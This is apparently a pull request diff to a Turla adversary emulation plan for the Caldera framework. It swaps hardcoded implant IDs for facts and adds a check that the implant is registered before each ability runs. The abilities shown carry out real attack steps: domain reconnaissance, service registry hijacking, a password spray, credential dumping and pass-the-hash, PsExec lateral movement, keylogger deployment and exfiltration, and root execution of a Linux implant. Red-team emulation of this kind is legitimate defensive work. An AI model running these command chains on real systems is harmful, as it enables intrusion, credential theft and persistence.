### PR TITLE
Turla - Check Implant Registered Requirement

### DIFF
--- a/turla/Emulation_Plan/yaml/Carbon_Scenario.md
+++ b/turla/Emulation_Plan/yaml/Carbon_Scenario.md
@@ -29,7 +29,13 @@ Before running the operation, you will need to make sure that the Turla fact sou
 - `third.target.ntlm`: The NTLM hash for the third target user.
 - `apache.server.ip`: The IP address of the Apache server.
 - `attacker.host.ip`: The IP address of the attacker's host.
+- `first.epic.id`: The first EPIC implant ID
+- `second.epic.id`: The second EPIC implant ID
+- `first.carbon.id`: The first Carbon implant ID
+- `second.carbon.id`: The second Carbon implant ID
+- `third.carbon.id`: The third Carbon implant ID
 
+Generally, it’s only possible to task a Caldera agent which is alive and actively checking in with the Caldera server. However, due to the integration between the `evalsc2client.py` and the Caldera Emu plugin in this port, the user is effectively tasking the Sandcat agent to task `evalsc2client.py` to task an implant through the Control Server, which makes it possible to task an implant that is not active. Therefore, a Caldera requirement was implemented to prevent an ability from executing if the implant tasked in that ability was not actively beaconing in. This requirement uses the facts for the EPIC and Carbon implant IDs, which are listed above.
 
 # RUNNING THE OPERATION
 

--- a/turla/Emulation_Plan/yaml/Carbon_Scenario.md
+++ b/turla/Emulation_Plan/yaml/Carbon_Scenario.md
@@ -29,11 +29,11 @@ Before running the operation, you will need to make sure that the Turla fact sou
 - `third.target.ntlm`: The NTLM hash for the third target user.
 - `apache.server.ip`: The IP address of the Apache server.
 - `attacker.host.ip`: The IP address of the attacker's host.
-- `first.epic.id`: The first EPIC implant ID
-- `second.epic.id`: The second EPIC implant ID
-- `first.carbon.id`: The first Carbon implant ID
-- `second.carbon.id`: The second Carbon implant ID
-- `third.carbon.id`: The third Carbon implant ID
+- `first.epic.id`: The first EPIC implant ID.
+- `second.epic.id`: The second EPIC implant ID.
+- `first.carbon.id`: The first Carbon implant ID.
+- `second.carbon.id`: The second Carbon implant ID.
+- `third.carbon.id`: The third Carbon implant ID.
 
 Generally, it’s only possible to task a Caldera agent which is alive and actively checking in with the Caldera server. However, due to the integration between the `evalsc2client.py` and the Caldera Emu plugin in this port, the user is effectively tasking the Sandcat agent to task `evalsc2client.py` to task an implant through the Control Server, which makes it possible to task an implant that is not active. Therefore, a Caldera requirement was implemented to prevent an ability from executing if the implant tasked in that ability was not actively beaconing in. This requirement uses the facts for the EPIC and Carbon implant IDs, which are listed above.
 

--- a/turla/Emulation_Plan/yaml/Snake_Scenario.md
+++ b/turla/Emulation_Plan/yaml/Snake_Scenario.md
@@ -38,6 +38,15 @@ Before running the operation, you will need to make sure that the Turla fact sou
 - `domain.admin.user`: The username of a domain admin.
 - `new.domain.user`: The username of the new domain user.
 - `new.domain.password`: The password of the new domain user.
+- `first.epic.id`: The first EPIC implant ID.
+- `first.snake.id`: The first Snake implant ID.
+- `second.snake.id`: The second Snake implant ID.
+- `third.snake.id`: The third Snake implant ID.
+- `lightneuron.implant.id`: The Lightneuron implant ID.
+
+Generally, it’s only possible to task a Caldera agent which is alive and actively checking in with the Caldera server. However, due to the integration between the [`evalsc2client.py`](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/turla/Resources/control_server/evalsC2client.py) and the Caldera Emu plugin in this port, the user is effectively tasking the Sandcat agent to task `evalsc2client.py` to task an implant through the Control Server, which makes it possible to task an implant that is not active. Therefore, a Caldera requirement was implemented to prevent an ability from executing if the implant tasked in that ability was not actively beaconing in. This requirement uses the facts for the EPIC and Snake implant IDs, which are listed above.
+
+Additionally, a separate Caldera requirement was implemented for the Lightneuron implant. This requirement will allow an ability to execute if the Lightneuron implant ID is listed in the agents tab of the Caldera Server GUI, even if the agent is dead and untrusted. The Lightneuron agent only sends one initial beacon to the Server, and is then considered a dead agent. This custom requirement will allow Lightneuron to be tasked despite that fact that it appears dead in the Caldera GUI.
 
 # RUNNING THE OPERATION
 

--- a/turla/Emulation_Plan/yaml/turla_carbon.yaml
+++ b/turla/Emulation_Plan/yaml/turla_carbon.yaml
@@ -42,7 +42,27 @@
       description: The network domain name for initial target system.
       type: string
       default: skt
-      
+    first.epic.id: 
+      description: First epic implant ID
+      type: string
+      default: 218780a0-870e-480e-b2c5dc
+    second.epic.id: 
+      description: Second epic implant ID
+      type: string
+      default: 51515228-8a7b-4226-e6e3f4
+    first.carbon.id: 
+      description: First carbon implant ID
+      type: string
+      default: 9b5ef515
+    second.carbon.id: 
+      description: Second carbon implant ID
+      type: string
+      default: a3e63922
+    third.carbon.id: 
+      description: Third carbon implant ID
+      type: string
+      default: c6f2aa03
+
 - id: 2c7ad0e1-d112-4c71-8deb-38bc3ce5654b
   name: Download EPIC dropper (User)
   description: |
@@ -232,7 +252,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 218780a0-870e-480e-b2c5dc 'exe | net group "Domain Admins" /domain && net group "Domain Computers" /domain && net group "Domain Controllers" /domain && tasklist /svc' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{first.epic.id} 'exe | net group "Domain Admins" /domain && net group "Domain Computers" /domain && net group "Domain Controllers" /domain && tasklist /svc' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: first.epic.id
 
 - id: 88bb16c5-f78b-45c3-91b6-a7422cd2fb13
   name: Reg query the ViperVPNSvc Service & verify which users can access it (Adversary)
@@ -248,7 +271,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 218780a0-870e-480e-b2c5dc 'exe | reg query HKLM\SYSTEM\CurrentControlSet\Services\ViperVPNSvc && powershell "$(Get-Acl -Path HKLM:\SYSTEM\CurrentControlSet\Services\ViperVPNSvc).Access"' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{first.epic.id} 'exe | reg query HKLM\SYSTEM\CurrentControlSet\Services\ViperVPNSvc && powershell "$(Get-Acl -Path HKLM:\SYSTEM\CurrentControlSet\Services\ViperVPNSvc).Access"' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: first.epic.id
 
 - id: d5e29782-72ca-45f0-b286-09525ae91d75
   name: Modify the ViperVPN service registry key (Adversary)
@@ -264,8 +290,11 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 218780a0-870e-480e-b2c5dc 'exe | reg add "HKLM\system\currentcontrolset\services\ViperVPNSvc" /t REG_EXPAND_SZ /v ImagePath /d "cmd.exe /c %TEMP%\mxs_installer.exe" /f' --task-wait-timeout 60
-
+          ./evalsC2client.py --set-and-complete-task #{first.epic.id} 'exe | reg add "HKLM\system\currentcontrolset\services\ViperVPNSvc" /t REG_EXPAND_SZ /v ImagePath /d "cmd.exe /c %TEMP%\mxs_installer.exe" /f' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: first.epic.id
+      
 - id: 349d3879-c849-493a-989e-6d7f40015f54
   name: RDP to 2nd host (User)
   description: |
@@ -354,7 +383,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 51515228-8a7b-4226-e6e3f4 'name | C:\Windows\System32\WinResSvc.exe | dropper.exe' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{second.epic.id} 'name | C:\Windows\System32\WinResSvc.exe | dropper.exe' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: second.epic.id
 
 - id: d702d810-3414-4e38-8cbc-22fc429d2da4
   name: Execute the CARBON-DLL installer (Adversary)
@@ -370,9 +402,12 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 51515228-8a7b-4226-e6e3f4 'exe | C:\Windows\System32\WinResSvc.exe' --task-wait-timeout 60; 
+          ./evalsC2client.py --set-and-complete-task #{second.epic.id} 'exe | C:\Windows\System32\WinResSvc.exe' --task-wait-timeout 60; 
           sleep 180;
         timeout: 300
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: second.epic.id
 
 - id: f2462df4-2867-4d72-b3f1-ffa9a7431f87
   name: Perform whoami discovery command (Adversary)
@@ -388,8 +423,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 9b5ef515 '{"id": 0, "cmd": "whoami"}' --task-wait-timeout 60
-
+          ./evalsC2client.py --set-and-complete-task #{first.carbon.id} '{"id": 0, "cmd": "whoami"}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: first.carbon.id
 
 # Step 5 - Lateral Movement to Domain Controller
 
@@ -434,9 +471,12 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 9b5ef515  '{"id": 1, "payload": "password_spray.bat", "payload_dest": "C:\\Windows\\Temp\\winsas64.bat", "cmd": "C:\\Windows\\Temp\\winsas64.bat"}' --task-wait-timeout 300 | grep 'SUCCESS'
+          ./evalsC2client.py --set-and-complete-task #{first.carbon.id}  '{"id": 1, "payload": "password_spray.bat", "payload_dest": "C:\\Windows\\Temp\\winsas64.bat", "cmd": "C:\\Windows\\Temp\\winsas64.bat"}' --task-wait-timeout 300 | grep 'SUCCESS'
         timeout: 300
-        
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: first.carbon.id
+
 - id: 4945a1e5-75ab-4665-8441-6995105edf38
   name: Remove password spray script (Adversary)
   description: |
@@ -451,7 +491,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 9b5ef515  '{"id": 2, "cmd": "del /Q C:\\Windows\\Temp\\winsas64.bat"}' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{first.carbon.id}  '{"id": 2, "cmd": "del /Q C:\\Windows\\Temp\\winsas64.bat"}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: first.carbon.id
 
 - id: 386b614d-7237-4d1a-a6dd-543f6f515bd4
   name: Download second CARBON-DLL (Adversary)
@@ -467,12 +510,15 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 9b5ef515 '{"id": 3, "payload": "carbon_installer_2.exe", "payload_dest": "C:\\Windows\\Temp\\wmimetricsq.exe", "cmd": "move C:\\Windows\\Temp\\wmimetricsq.exe \\\\#{second.target.host}\\C$\\Windows\\System32"}' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{first.carbon.id} '{"id": 3, "payload": "carbon_installer_2.exe", "payload_dest": "C:\\Windows\\Temp\\wmimetricsq.exe", "cmd": "move C:\\Windows\\Temp\\wmimetricsq.exe \\\\#{second.target.host}\\C$\\Windows\\System32"}' --task-wait-timeout 60
   input_arguments:
     second.target.host: 
       description: The hostname of the second target host.
       type: string
       default: bannik
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: first.carbon.id
 
 - id: 954ee411-8443-41f9-9a0c-f8ac032b68e7
   name: Enumerate remote scheduled tasks (Adversary)
@@ -488,7 +534,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 9b5ef515 '{"id": 4, "cmd": "schtasks /query /S #{second.target.host} /U #{network.domain.name}\\#{second.target.user} /P #{second.target.password}"}' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{first.carbon.id} '{"id": 4, "cmd": "schtasks /query /S #{second.target.host} /U #{network.domain.name}\\#{second.target.user} /P #{second.target.password}"}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: first.carbon.id
 
 - id: c90bbb6c-f9bd-4811-b7b7-c923902a8bde
   name: Modify remote scheduled task (Adversary)
@@ -504,7 +553,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 9b5ef515 '{"id": 5, "cmd": "schtasks /Change /S #{second.target.host} /U #{network.domain.name}\\#{second.target.user} /P #{second.target.password} /TN \"\\Microsoft\\Windows\\Customer Experience Improvement Program\\Consolidator\" /TR %SystemRoot%\\System32\\wmimetricsq.exe"}' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{first.carbon.id} '{"id": 5, "cmd": "schtasks /Change /S #{second.target.host} /U #{network.domain.name}\\#{second.target.user} /P #{second.target.password} /TN \"\\Microsoft\\Windows\\Customer Experience Improvement Program\\Consolidator\" /TR %SystemRoot%\\System32\\wmimetricsq.exe"}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: first.carbon.id
 
 - id: a2621060-73a5-461b-918d-88a86f83c21b
   name: Execute modified scheduled task (Adversary)
@@ -520,9 +572,12 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 9b5ef515 '{"id": 6, "cmd": "schtasks /Run /S #{second.target.host} /U #{network.domain.name}\\#{second.target.user} /P #{second.target.password} /TN \"\\Microsoft\\Windows\\Customer Experience Improvement Program\\Consolidator\" /I"}' --task-wait-timeout 300; 
+          ./evalsC2client.py --set-and-complete-task #{first.carbon.id} '{"id": 6, "cmd": "schtasks /Run /S #{second.target.host} /U #{network.domain.name}\\#{second.target.user} /P #{second.target.password} /TN \"\\Microsoft\\Windows\\Customer Experience Improvement Program\\Consolidator\" /I"}' --task-wait-timeout 300; 
           sleep 180;
         timeout: 300
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: first.carbon.id
 
 - id: bf90a64c-5367-4de6-93b5-a718189803c3
   name: Discovery on domain controller (Adversary)
@@ -538,8 +593,11 @@
     linux:
       sh:
         command: |
-          output=$(./evalsC2client.py --set-and-complete-task a3e63922 '{"id": 0, "cmd": "net group /domain"}' --task-wait-timeout 60);
+          output=$(./evalsC2client.py --set-and-complete-task #{second.carbon.id} '{"id": 0, "cmd": "net group /domain"}' --task-wait-timeout 60);
           echo $output | grep 'Web Servers' -i && echo $output | grep 'Web Server Admins' -i;
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: second.carbon.id
 
 - id: 4e39b630-f2d7-405e-a4ef-d11cf79db1be
   name: Enumerate groups (Adversary)
@@ -555,7 +613,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task a3e63922 '{"id": 1, "cmd": "net group \"Web Servers\" /domain && net group \"Web Server Admins\" /domain"}' --task-wait-timeout 60;
+          ./evalsC2client.py --set-and-complete-task #{second.carbon.id} '{"id": 1, "cmd": "net group \"Web Servers\" /domain && net group \"Web Server Admins\" /domain"}' --task-wait-timeout 60;
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: second.carbon.id
 
 - id: 4e31798e-f973-4480-aa38-3372c44c29c9
   name: Enumerate Active Directory Computers (Adversary)
@@ -571,13 +632,15 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task a3e63922 '{"id": 2, "cmd": "dsquery * -filter \"(&(objectclass=computer))\" -attr *"}' --task-wait-timeout 60 | grep -i '#{third.target.user} Workstation'
+          ./evalsC2client.py --set-and-complete-task #{second.carbon.id} '{"id": 2, "cmd": "dsquery * -filter \"(&(objectclass=computer))\" -attr *"}' --task-wait-timeout 60 | grep -i '#{third.target.user} Workstation'
   input_arguments:
     third.target.user:
       description: The username of the third target host.
       type: string
       default: adalwolfa
-
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: second.carbon.id
 
 # Step 6 - Preparation for Lateral Movement onto Second Host
 
@@ -595,8 +658,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task a3e63922 '{"id": 3, "payload": "DvKGMmGn.exe", "payload_dest": "C:\\Windows\\Temp\\terabox.exe", "cmd": "move C:\\Windows\\Temp\\terabox.exe C:\\Windows\\System32\\terabox.exe && C:\\Windows\\System32\\terabox.exe \"lsdu::go /ynot\" \"quit\""}' --task-wait-timeout 60
-
+          ./evalsC2client.py --set-and-complete-task #{second.carbon.id} '{"id": 3, "payload": "DvKGMmGn.exe", "payload_dest": "C:\\Windows\\Temp\\terabox.exe", "cmd": "move C:\\Windows\\Temp\\terabox.exe C:\\Windows\\System32\\terabox.exe && C:\\Windows\\System32\\terabox.exe \"lsdu::go /ynot\" \"quit\""}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: second.carbon.id
 
 # Step 7 - Lateral Movement to Second Workstation
 
@@ -668,7 +733,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task a3e63922 '{"id": 4, "payload": "PsExec.exe", "payload_dest": "C:\\Windows\\Temp\\tmp5712.tmp", "cmd": "move C:\\Windows\\Temp\\tmp5712.tmp C:\\Windows\\System32\\wsqsp.exe && dir C:\\Windows\\System32\\wsqsp.exe"}' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{second.carbon.id} '{"id": 4, "payload": "PsExec.exe", "payload_dest": "C:\\Windows\\Temp\\tmp5712.tmp", "cmd": "move C:\\Windows\\Temp\\tmp5712.tmp C:\\Windows\\System32\\wsqsp.exe && dir C:\\Windows\\System32\\wsqsp.exe"}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: second.carbon.id
 
 - id: 75424a6a-28f5-46fa-834b-508f7d09020a
   name: Download third CARBON-DLL (Adversary)
@@ -684,7 +752,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task a3e63922 '{"id": 5, "payload": "carbon_installer_3.exe", "payload_dest": "C:\\Windows\\Temp\\tmp1283.tmp", "cmd": "move C:\\Windows\\Temp\\tmp1283.tmp C:\\Windows\\System32\\wsqmanager.exe && dir C:\\Windows\\System32\\wsqmanager.exe"}' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{second.carbon.id} '{"id": 5, "payload": "carbon_installer_3.exe", "payload_dest": "C:\\Windows\\Temp\\tmp1283.tmp", "cmd": "move C:\\Windows\\Temp\\tmp1283.tmp C:\\Windows\\System32\\wsqmanager.exe && dir C:\\Windows\\System32\\wsqmanager.exe"}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: second.carbon.id
 
 - id: 824d5eda-7743-4c10-89d8-143d4bc50eda
   name: Copy installer & execute using PsExec (Adversary)
@@ -700,7 +771,7 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task a3e63922 '{"id": 6, "cmd": "C:\\Windows\\System32\\terabox.exe \"pr::d\" \"slsa::htp /user:#{third.target.user} /domain:#{network.domain.name} /ntlm:#{third.target.ntlm} /remotepc:#{third.target.host} /pexe:C:\\Windows\\System32\\wsqsp.exe /sys:1 /prun:C:\\Windows\\System32\\wsqmanager.exe\" \"quit\""}' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{second.carbon.id} '{"id": 6, "cmd": "C:\\Windows\\System32\\terabox.exe \"pr::d\" \"slsa::htp /user:#{third.target.user} /domain:#{network.domain.name} /ntlm:#{third.target.ntlm} /remotepc:#{third.target.host} /pexe:C:\\Windows\\System32\\wsqsp.exe /sys:1 /prun:C:\\Windows\\System32\\wsqmanager.exe\" \"quit\""}' --task-wait-timeout 60
   input_arguments:
     third.target.ntlm: 
       description: The NTLM hash for the third target user.
@@ -710,7 +781,10 @@
       description: The hostname of the third target host.
       type: string
       default: khabibulin 
-
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: second.carbon.id
+      
 - id: e7c827d6-57f8-40d0-b3a9-e03b2e4d0484
   name: Clean dropped files (Adversary)
   description: |
@@ -725,8 +799,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task a3e63922 '{"id": 7, "cmd": "del /Q C:\\Windows\\System32\\terabox.exe C:\\Windows\\System32\\wsqsp.exe C:\\Windows\\System32\\wsqmanager.exe"}' --task-wait-timeout 60
-    
+          ./evalsC2client.py --set-and-complete-task #{second.carbon.id} '{"id": 7, "cmd": "del /Q C:\\Windows\\System32\\terabox.exe C:\\Windows\\System32\\wsqsp.exe C:\\Windows\\System32\\wsqmanager.exe"}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: second.carbon.id
 
 # Step 8 - Credential Access on Admin Host
 
@@ -744,7 +820,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task c6f2aa03 '{"id": 0, "payload": "keylogger.exe", "payload_dest": "C:\\Windows\\Temp\\wingtsvcupdt.exe", "cmd": "C:\\Windows\\Temp\\wingtsvcupdt.exe -r"}' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{third.carbon.id} '{"id": 0, "payload": "keylogger.exe", "payload_dest": "C:\\Windows\\Temp\\wingtsvcupdt.exe", "cmd": "C:\\Windows\\Temp\\wingtsvcupdt.exe -r"}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: third.carbon.id
 
 - id: 4cedd0ef-c802-431d-a4a1-eaf1163543f3
   name: Adalwolfa types keylogged data (User)
@@ -809,7 +888,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task c6f2aa03 '{"id": 1, "cmd": "taskkill /IM wingtsvcupdt.exe /F"}' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{third.carbon.id} '{"id": 1, "cmd": "taskkill /IM wingtsvcupdt.exe /F"}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: third.carbon.id
 
 - id: 438939c8-e95a-4fbd-b659-06f0b0b72e47
   name: Exfiltrate keylogged data (Adversary)
@@ -825,8 +907,11 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task c6f2aa03 '{"id": 2, "cmd": "type %temp%\\~DFA512.tmp"}' --task-wait-timeout 200
+          ./evalsC2client.py --set-and-complete-task #{third.carbon.id} '{"id": 2, "cmd": "type %temp%\\~DFA512.tmp"}' --task-wait-timeout 200
         timeout: 200
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: third.carbon.id
 
 - id: f8ab9b59-89a7-4c25-90bf-0c2485785a36
   name: Remove keylogging evidence (Adversary)
@@ -842,8 +927,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task c6f2aa03 '{"id": 3, "cmd": "del /Q C:\\Windows\\Temp\\wingtsvcupdt.exe %temp%\\~DFA512.tmp"}' --task-wait-timeout 60
-
+          ./evalsC2client.py --set-and-complete-task #{third.carbon.id} '{"id": 3, "cmd": "del /Q C:\\Windows\\Temp\\wingtsvcupdt.exe %temp%\\~DFA512.tmp"}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: third.carbon.id
 
 # Step 9 - Lateral Movement to Linux Server
 
@@ -861,7 +948,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task c6f2aa03 '{"id": 4, "payload": "hsperfdata.zip", "payload_dest": "C:\\Windows\\Temp\\tmp504e.tmp", "cmd": "dir C:\\Windows\\Temp\\tmp504e.tmp"}' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{third.carbon.id} '{"id": 4, "payload": "hsperfdata.zip", "payload_dest": "C:\\Windows\\Temp\\tmp504e.tmp", "cmd": "dir C:\\Windows\\Temp\\tmp504e.tmp"}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: third.carbon.id
 
 - id: d760974d-6466-40b9-8532-b6be578428fc
   name: Download pscp.exe (Adversary)
@@ -877,7 +967,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task c6f2aa03 '{"id": 5, "payload": "pscp.exe", "payload_dest": "C:\\Windows\\Temp\\pscp.exe", "cmd": "move C:\\Windows\\Temp\\pscp.exe C:\\Windows\\System32\\pscp.exe && dir C:\\Windows\\System32\\pscp.exe"}' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{third.carbon.id} '{"id": 5, "payload": "pscp.exe", "payload_dest": "C:\\Windows\\Temp\\pscp.exe", "cmd": "move C:\\Windows\\Temp\\pscp.exe C:\\Windows\\System32\\pscp.exe && dir C:\\Windows\\System32\\pscp.exe"}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: third.carbon.id
 
 - id: 83a79c7d-721c-44ac-b8d5-d9ba2bc84852
   name: Copy Penquin to Apache web server (Adversary)
@@ -893,7 +986,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task c6f2aa03 '{"id": 6, "cmd": "echo y | C:\\Windows\\System32\\pscp.exe -pw #{third.target.password} C:\\Windows\\Temp\\tmp504e.tmp #{third.target.user}@#{apache.server.ip}:/tmp/tmp514f524f"}' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{third.carbon.id} '{"id": 6, "cmd": "echo y | C:\\Windows\\System32\\pscp.exe -pw #{third.target.password} C:\\Windows\\Temp\\tmp504e.tmp #{third.target.user}@#{apache.server.ip}:/tmp/tmp514f524f"}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: third.carbon.id
 
 - id: 4468cc14-8e77-44cd-93de-b892253b3e27
   name: Download plink.exe (Adversary)
@@ -909,7 +1005,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task c6f2aa03 '{"id": 7, "payload": "plink.exe", "payload_dest": "C:\\Windows\\Temp\\plink.exe", "cmd": "move C:\\Windows\\Temp\\plink.exe C:\\Windows\\System32\\plink.exe && dir C:\\Windows\\System32\\plink.exe"}' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{third.carbon.id} '{"id": 7, "payload": "plink.exe", "payload_dest": "C:\\Windows\\Temp\\plink.exe", "cmd": "move C:\\Windows\\Temp\\plink.exe C:\\Windows\\System32\\plink.exe && dir C:\\Windows\\System32\\plink.exe"}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: third.carbon.id
 
 - id: 8c6a546b-e03b-4761-b422-8eaf40f59580
   name: Execute Penquin (Adversary)
@@ -925,8 +1024,11 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task c6f2aa03 '{"id": 8, "cmd": "(echo unzip /tmp/tmp514f524f -d /tmp & echo sudo mv /tmp/hsperfdata /root/hsperfdata & echo sudo /root/hsperfdata & echo exit) | C:\\Windows\\System32\\plink.exe -ssh -l #{third.target.user} -pw #{third.target.password} #{apache.server.ip}"}' --task-wait-timeout 200; sleep 60;
+          ./evalsC2client.py --set-and-complete-task #{third.carbon.id} '{"id": 8, "cmd": "(echo unzip /tmp/tmp514f524f -d /tmp & echo sudo mv /tmp/hsperfdata /root/hsperfdata & echo sudo /root/hsperfdata & echo exit) | C:\\Windows\\System32\\plink.exe -ssh -l #{third.target.user} -pw #{third.target.password} #{apache.server.ip}"}' --task-wait-timeout 200; sleep 60;
         timeout: 200
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: third.carbon.id
 
 - id: 1fe4de9d-d8d3-4188-8a2a-6ff42394400c
   name: Clean up downloaded files (Adversary)
@@ -942,8 +1044,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task c6f2aa03 '{"id": 9, "cmd": "del /Q C:\\Windows\\Temp\\tmp504e.tmp C:\\Windows\\System32\\pscp.exe C:\\Windows\\System32\\plink.exe"}' --task-wait-timeout 60
-
+          ./evalsC2client.py --set-and-complete-task #{third.carbon.id} '{"id": 9, "cmd": "del /Q C:\\Windows\\Temp\\tmp504e.tmp C:\\Windows\\System32\\pscp.exe C:\\Windows\\System32\\plink.exe"}' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: third.carbon.id
 
 # Step 10 - Installation of Watering Hole
 

--- a/turla/Emulation_Plan/yaml/turla_snake.yaml
+++ b/turla/Emulation_Plan/yaml/turla_snake.yaml
@@ -43,6 +43,26 @@
       description: The network domain name.
       type: string
       default: nk
+    first.epic.id: 
+      description: First epic implant ID
+      type: string
+      default: 218780a0-870e-480e-b2c5dc
+    first.snake.id: 
+      description: First snake implant ID
+      type: string
+      default: 534b40585d514b554844
+    second.snake.id: 
+      description: Second snake implant ID
+      type: string
+      default: 5054474d50435a51404b
+    third.snake.id: 
+      description: Third snake implant ID
+      type: string
+      default: 475e465e424557475b42
+    lightneuron.implant.id:
+      description: Lightneuron implant ID
+      type: string
+      default: info@nk.local
 
 - id: 78f44095-73b0-4ab4-a4cc-e5090ae1ae44
   name: Download malicious update (User)
@@ -194,7 +214,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 218780a0-870e-480e-b2c5dc 'exe | systeminfo && net group "Domain Computers" /domain' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{first.epic.id} 'exe | systeminfo && net group "Domain Computers" /domain' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: first.epic.id
 
 
 # Step 12 - Rootkit Installation
@@ -213,7 +236,10 @@
     linux:
       sh:
         command: |
-          ./evalsC2client.py --set-and-complete-task 218780a0-870e-480e-b2c5dc 'name | C:\\Users\\#{first.target.user}\\Desktop\\gusbsys.exe | snake.exe' --task-wait-timeout 60
+          ./evalsC2client.py --set-and-complete-task #{first.epic.id} 'name | C:\\Users\\#{first.target.user}\\Desktop\\gusbsys.exe | snake.exe' --task-wait-timeout 60
+  requirements:
+    - plugins.emu.app.requirements.check_registered:
+      - source: first.epic.id
 
 - id: 0daff7a0-d1e4-4bf2-8100-c0a824a34c52
   name: Execute the 1st Snake installer (Adversary)
@@ -229,7 +255,10 @@
     linux:
       sh:
         command: |
